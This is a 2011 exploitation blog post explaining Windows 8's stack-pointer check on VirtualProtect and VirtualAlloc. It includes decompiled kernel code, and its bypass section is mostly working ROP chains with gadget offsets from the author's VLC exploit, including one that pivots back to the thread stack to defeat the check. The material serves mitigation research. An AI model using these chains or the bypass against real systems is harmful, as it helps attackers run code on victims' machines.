Windows 8 introduced a number of exploit mitigation features, including hardening of both the userland and kernel heaps, mitigation against kernel-mode NULL pointer dereferences, and protection against abuse of virtual function pointer tables. One feature that stood out to me appears to be designed to help mitigate exploits leveraging return-oriented programming (ROP).
For those who don’t know, ROP is a generalization of the classic return-to-libc attack that involves leveraging small sequences of instructions, typically function epilogues, at known addresses to execute arbitrary code incrementally. This is achieved by controlling data pointed to by ESP, the stack pointer register, such that each ret instruction results in incrementing ESP and transferring execution to the next address chosen by the attacker.
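To make the mechanics concrete, here is a toy model of a ROP chain. It is only a sketch: the gadget addresses (0x1000 and so on) and the three gadgets themselves are invented for illustration, and a Python list index stands in for ESP. What it shows is the control flow described above, where every ret pops the next attacker-chosen address and advances the stack pointer.

```python
# Toy model of ret-driven execution. The gadget addresses and bodies are
# hypothetical; a list index stands in for ESP.

def pop_eax(regs, stack, sp):
    # "pop eax" consumes one extra slot from the attacker-controlled stack.
    regs["eax"] = stack[sp]
    return sp + 1

def inc_eax(regs, stack, sp):
    regs["eax"] += 1
    return sp

def mov_ebx_eax(regs, stack, sp):
    regs["ebx"] = regs["eax"]
    return sp

GADGETS = {
    0x1000: ("pop eax; ret", pop_eax),
    0x2000: ("inc eax; ret", inc_eax),
    0x3000: ("mov ebx, eax; ret", mov_ebx_eax),
}

def run_chain(stack):
    """Walk the chain: each ret pops an address and jumps to that gadget."""
    regs = {"eax": 0, "ebx": 0}
    sp = 0
    trace = []
    while sp < len(stack):
        address = stack[sp]   # ret reads the next address from the stack...
        sp += 1               # ...and moves the stack pointer past it
        name, body = GADGETS[address]
        sp = body(regs, stack, sp)
        trace.append(name)
    return regs, trace

# The "payload" is nothing but addresses and data laid out on the stack.
chain = [0x1000, 41, 0x2000, 0x3000]
regs, trace = run_chain(chain)
print(trace)
print(regs)
```

No new code is ever injected in this model. The attacker only decides the order in which existing instruction sequences run and the data they consume.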
Because finding sequences of useful instructions (known as “gadgets”) may be difficult depending on the exploitation scenario, most real ROP exploits use an initial ROP stager to create a writable and executable memory segment that a second-stage traditional shellcode can be copied into. Most frequently, VirtualProtect can be used to mark an existing executable segment writable, or VirtualAlloc can be used to create a fresh segment. Other variations also exist.
A second trait common to many ROP exploits is that the ROP payload itself often doesn’t live in the thread’s stack, due to either the nature of the vulnerability itself or limits on the attacker’s ability to introduce code into portions of the vulnerable application’s address space. Instead, it’s much more common for a ROP payload to be positioned in the heap and pivot the stack pointer into the heap, at which point the ROP payload can run.
Microsoft has evidently been paying attention and noticed these two common factors. In an attempt to mitigate these types of exploits, Windows 8 implements a simple protection mechanism: every function associated with manipulating virtual memory, including the often-abused VirtualProtect and VirtualAlloc, now includes a check that the stack pointer, as contained in the trap frame, falls within the range defined by the Thread Environment Block (TEB). Code courtesy of Alex Ionescu:
char __cdecl PsValidateUserStack()
{
  char Status; // al@1
  _KTRAP_FRAME *TrapFrame; // ecx@3
  _TEB *Teb; // ecx@3
  void *.Eip; // [sp+10h] [bp-88h]@3
  unsigned int .Esp; // [sp+14h] [bp-84h]@3
  void *StackLimit; // [sp+18h] [bp-80h]@3
  void *StackBase; // [sp+1Ch] [bp-7Ch]@3
  _EXCEPTION_RECORD ExitStatus; // [sp+24h] [bp-74h]@6
  CPPEH_RECORD ms_exc; // [sp+80h] [bp-18h]@3

  CurrentThread = (_ETHREAD *)__readfsdword(0x124u);
  Status = LOBYTE(CurrentThread->Tcb.___u42.UserAffinity.Reserved[0]); // PreviousMode == User
  if ( Status )
  {
    __asm { bt dword ptr [edx+58h], 13h } // KernelStackResident, ReadyTransition, Alertable
    Status = _CF;
    if ( _CF != 1 )
    {
      TrapFrame = CurrentThread->Tcb.TrapFrame;
      .Esp = TrapFrame->HardwareEsp;
      .Eip = (void *)TrapFrame->Eip;
      Teb = (_TEB *)CurrentThread->Tcb.Teb;
      ms_exc.disabled = 0;
      StackLimit = Teb->DeallocationStack;
      StackBase = Teb->NtTib.StackBase;
      ms_exc.disabled = -2;
      Status = .Esp;
      if ( .Esp < (unsigned int)StackLimit || .Esp >= (unsigned int)StackBase )
      {
        memset(&ExitStatus, 0, 0x50u);
        ExitStatus.ExceptionCode = STATUS_STACK_BUFFER_OVERRUN;
        ExitStatus.ExceptionAddress = .Eip;
        ExitStatus.NumberParameters = 2;
        ExitStatus.ExceptionInformation[0] = 4;
        ExitStatus.ExceptionInformation[1] = .Esp;
        Status = DbgkForwardException(&ExitStatus, 1, 1);
        if ( !Status )
        {
          Status = DbgkForwardException(&ExitStatus, 0, 1);
          if ( !Status )
            Status = ZwTerminateProcess((HANDLE)0xFFFFFFFF, ExitStatus.ExceptionCode);
        }
      }
    }
  }
  return Status;
}
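Stripped of the kernel plumbing, the decision in the listing above is a single range comparison. The sketch below models only that comparison, not the exception forwarding or process termination. The function name validate_user_stack and the example addresses are my own assumptions; the bounds follow the decompiled code, which reads the lower bound from the TEB's DeallocationStack field and the upper bound from NtTib.StackBase.

```python
# Models only the bounds test from PsValidateUserStack. The example
# addresses are hypothetical; real values depend on the thread.

STATUS_STACK_BUFFER_OVERRUN = 0xC0000409
STATUS_SUCCESS = 0

def validate_user_stack(esp, deallocation_stack, stack_base):
    """Return the status the check would raise for a given user-mode ESP."""
    # Same condition as the decompiled code: fail if ESP is below the lowest
    # address of the stack reservation or at/above the stack base.
    if esp < deallocation_stack or esp >= stack_base:
        return STATUS_STACK_BUFFER_OVERRUN
    return STATUS_SUCCESS

# Hypothetical 1 MB stack reservation for the current thread.
DEALLOCATION_STACK = 0x00030000
STACK_BASE = 0x00130000

on_stack = validate_user_stack(0x0012F000, DEALLOCATION_STACK, STACK_BASE)
on_heap = validate_user_stack(0x02A40000, DEALLOCATION_STACK, STACK_BASE)
at_base = validate_user_stack(STACK_BASE, DEALLOCATION_STACK, STACK_BASE)

print(hex(on_stack), hex(on_heap), hex(at_base))
```

Note that the upper bound is exclusive, so an ESP equal to the stack base fails the check just as a heap address does.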
As a result, exploits that leverage a ROP payload stored in the heap cannot return into VirtualProtect or VirtualAlloc to create a writable and executable segment. While this provides yet another hurdle for exploit writers, it’s fairly easy to bypass. Besides writing a full ROP payload that doesn’t have a second stage, which may be difficult depending on the availability of gadgets, one simple way of avoiding this protection is to give it what it wants: ensure ESP points into the current thread’s stack whenever virtual memory functions are called. In the example below, I’ll assume the attacker has access to the original stack pointer through some register, as is the case when a pivot is performed using an xchg instruction. If this isn’t the case, it may be worth investigating ways of finding the stack at runtime.
To demonstrate, let’s take the very basic ROP payload I used for a VLC exploit as an example. After triggering the vulnerability, I pivot the stack pointer into the heap using a gadget that executes the following:
xchg esi, esp
retn
In this case, the ESI register contains a pointer to heap data I control, so by pivoting the stack pointer into this region, I can execute my first-stage ROP payload:
rop = [
    rop_base + 0x1022,    # retn

    # Call VirtualProtect()
    rop_base + 0x2c283,   # pop eax; retn
    rop_base + 0x1212a4,  # IAT entry for VirtualProtect -> eax
    rop_base + 0x12fda,   # mov eax,DWORD PTR [eax]
    rop_base + 0x29d13,   # jmp eax

    rop_base + 0x1022,    # retn
    heap & ~0xfff,        # lpAddress
    0x60000,              # dwSize
    0x40,                 # flNewProtect
    heap - 0x1000,        # lpflOldProtect

    # Enough of this ROP business...
    rop_base + 0xdace8    # push esp; retn
]
This payload pulls the address for VirtualProtect from the Import Address Table (IAT), calls it to mark the heap executable, and jumps into the newly-executable heap to run a second-stage traditional shellcode.
Because ESP points into the heap at the time of the VirtualProtect call, this exploit would fail due to the newly introduced mitigation in Windows 8. However, it’s relatively simple to adapt it to bypass this mitigation. Below is the updated ROP payload:
rop = [
    rop_base + 0x1022,    # retn

    # Write lpflOldProtect
    rop_base + 0x2c283,   # pop eax; retn
    heap - 0x1000,        # lpflOldProtect -> eax
    rop_base + 0x1db4f,   # mov [esi],eax; retn
    rop_base + 0x3ab5e,   # dec esi; retn
    rop_base + 0x3ab5e,   # dec esi; retn
    rop_base + 0x3ab5e,   # dec esi; retn
    rop_base + 0x3ab5e,   # dec esi; retn

    # Write flNewProtect
    rop_base + 0x2c283,   # pop eax; retn
    0x40,                 # flNewProtect -> eax
    rop_base + 0x1db4f,   # mov [esi],eax; retn
    rop_base + 0x3ab5e,   # dec esi; retn
    rop_base + 0x3ab5e,   # dec esi; retn
    rop_base + 0x3ab5e,   # dec esi; retn
    rop_base + 0x3ab5e,   # dec esi; retn

    # Write dwSize
    rop_base + 0x2c283,   # pop eax; retn
    0x60000,              # dwSize -> eax
    rop_base + 0x1db4f,   # mov [esi],eax; retn
    rop_base + 0x3ab5e,   # dec esi; retn
    rop_base + 0x3ab5e,   # dec esi; retn
    rop_base + 0x3ab5e,   # dec esi; retn
    rop_base + 0x3ab5e,   # dec esi; retn

    # Write lpAddress
    rop_base + 0x2c283,   # pop eax; retn
    heap & ~0xfff,        # lpAddress -> eax
    rop_base + 0x1db4f,   # mov [esi],eax; retn
    rop_base + 0x3ab5e,   # dec esi; retn
    rop_base + 0x3ab5e,   # dec esi; retn
    rop_base + 0x3ab5e,   # dec esi; retn
    rop_base + 0x3ab5e,   # dec esi; retn

    # Write &Pivot
    rop_base + 0x2c283,   # pop eax; retn
    rop_base + 0x229a5,   # &pivot -> eax
    rop_base + 0x1db4f,   # mov [esi],eax; retn
    rop_base + 0x3ab5e,   # dec esi; retn
    rop_base + 0x3ab5e,   # dec esi; retn
    rop_base + 0x3ab5e,   # dec esi; retn
    rop_base + 0x3ab5e,   # dec esi; retn

    # Write &VirtualProtect
    rop_base + 0x2c283,   # pop eax; retn
    rop_base + 0x1212a4,  # IAT entry for VirtualProtect -> eax
    rop_base + 0x12fda,   # mov eax,DWORD PTR [eax]
    rop_base + 0x1db4f,   # mov [esi],eax; retn

    # Pivot ESP
    rop_base + 0x229a5,   # xchg esi,esp; retn

    # Jump into shellcode
    rop_base + 0xdace8    # push esp; retn
]
This is a very crude example, but I think it demonstrates the idea just fine. I write the arguments to VirtualProtect into the original stack, stored in the ESI register, one at a time. For the address that will be returned to coming out of VirtualProtect, I place a pivot to move ESP back to the heap. Finally, to trigger the whole thing, I actually return into my pivot gadget, which will pivot ESP back to the original stack and return into VirtualProtect.
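To see why the arguments are written in reverse order, it helps to trace what ends up on the original stack. The sketch below replays only the write phase of the payload, using string labels in place of real values. The starting address ORIG_ESP is a made-up number, and simulate_writes is a hypothetical helper of mine rather than part of the exploit; the last argument is labeled lpflOldProtect, the name Microsoft's documentation uses for it.

```python
# Replays the "mov [esi],eax" / "dec esi" x4 pattern from the payload.
# ORIG_ESP is a hypothetical address; the labels stand in for real values.

def simulate_writes(orig_esp, values):
    """Store each value at [esi], moving esi down 4 bytes between writes."""
    memory = {}
    esi = orig_esp
    for index, value in enumerate(values):
        memory[esi] = value              # mov [esi],eax
        if index != len(values) - 1:
            esi -= 4                     # four "dec esi" gadgets
    return esi, memory

ORIG_ESP = 0x0012F000

# Same order in which the payload performs its writes.
WRITE_ORDER = [
    "lpflOldProtect",
    "flNewProtect",
    "dwSize",
    "lpAddress",
    "&pivot",
    "&VirtualProtect",
]

final_esi, memory = simulate_writes(ORIG_ESP, WRITE_ORDER)

# Reading upward from the final ESI gives the frame the pivot returns into.
layout = [memory[address] for address in sorted(memory)]
for address in sorted(memory):
    print(hex(address), memory[address])
```

Read from the lowest address upward, the result is a standard stdcall frame: the pivot's retn pops &VirtualProtect, VirtualProtect sees &pivot as its return address, and the four arguments follow in order. When VirtualProtect returns, it lands on the pivot gadget, which swaps ESP back into the heap.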
In this case, adapting the exploit added an extra 124 bytes to the payload, but that was mostly because I was limited on gadget availability and had to resort to decrementing ESI one byte at a time. It’s probably possible to optimize this example with some extra work. In other cases, I’d expect it to be possible to implement this technique with much less overhead.
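The 124-byte figure can be checked by building both payloads and comparing their packed sizes. This is a sketch only: the rop_base and heap values below are placeholders I picked so the script runs, and write_dword is a hypothetical helper that emits the repeated write sequence. The gadget offsets are the ones from the listings above.

```python
import struct

# Placeholder addresses so the script runs; real values depend on the target.
rop_base = 0x10000000
heap = 0x0C0C0C0C

RETN = rop_base + 0x1022          # retn
POP_EAX = rop_base + 0x2c283      # pop eax; retn
VP_IAT = rop_base + 0x1212a4      # IAT entry for VirtualProtect
DEREF_EAX = rop_base + 0x12fda    # mov eax,DWORD PTR [eax]
JMP_EAX = rop_base + 0x29d13      # jmp eax
STORE = rop_base + 0x1db4f        # mov [esi],eax; retn
DEC_ESI = rop_base + 0x3ab5e      # dec esi; retn
PIVOT = rop_base + 0x229a5        # xchg esi,esp; retn
PUSH_ESP = rop_base + 0xdace8     # push esp; retn

ARGS = [heap & ~0xfff, 0x60000, 0x40, heap - 0x1000]

def write_dword(value):
    """Hypothetical helper: store value at [esi], then move esi down by 4."""
    return [POP_EAX, value, STORE] + [DEC_ESI] * 4

original = [RETN, POP_EAX, VP_IAT, DEREF_EAX, JMP_EAX, RETN] + ARGS + [PUSH_ESP]

updated = [RETN]
for value in reversed(ARGS):      # last argument is written first
    updated += write_dword(value)
updated += write_dword(PIVOT)     # return address for VirtualProtect
updated += [POP_EAX, VP_IAT, DEREF_EAX, STORE]
updated += [PIVOT, PUSH_ESP]

def pack(chain):
    """Serialize the chain as little-endian 32-bit values."""
    return struct.pack("<%dI" % len(chain), *chain)

original_size = len(pack(original))
updated_size = len(pack(updated))
overhead = updated_size - original_size
print(original_size, updated_size, overhead)
```

Twenty of the extra dwords are dec esi gadgets, which is where a gadget that subtracts 4 from ESI in one step would save the most space.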
This entry was posted on Wednesday, September 21st, 2011 at 11:03 pm and is filed under Exploitation.